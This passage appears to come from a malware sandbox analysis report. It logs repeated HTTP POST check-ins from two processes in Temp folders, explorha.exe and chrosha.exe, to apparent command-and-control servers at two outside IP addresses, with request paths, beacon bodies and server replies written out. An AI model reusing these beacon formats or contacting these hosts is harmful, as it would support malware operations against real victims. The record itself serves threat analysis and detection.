                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:33.833966017 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:33.835388899 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:34.087327957 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      144192.168.2.549981193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:33.896821976 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:34.139657974 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      145192.168.2.549984193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:34.393057108 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:34.645452023 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      146192.168.2.549985193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:34.443819046 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:34.691375971 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:34.692500114 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:34.944919109 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      147192.168.2.549986193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:35.011377096 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:35.253305912 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      148192.168.2.549987193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:35.319962978 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:35.568784952 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:35.589591026 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:35.843333006 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      149192.168.2.549988193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:35.532418966 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:35.776182890 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      150192.168.2.549989193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:36.138465881 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:36.384691000 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      151192.168.2.549990193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:36.251488924 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:36.495367050 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:36.498276949 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:36.746958971 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      152192.168.2.549991193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:36.633208990 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:36.879944086 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      153192.168.2.549992193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:37.104927063 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:37.350583076 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:37.352253914 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:37.603714943 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      154192.168.2.549993193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:37.241275072 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:37.485696077 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      155192.168.2.549994193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:37.740948915 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
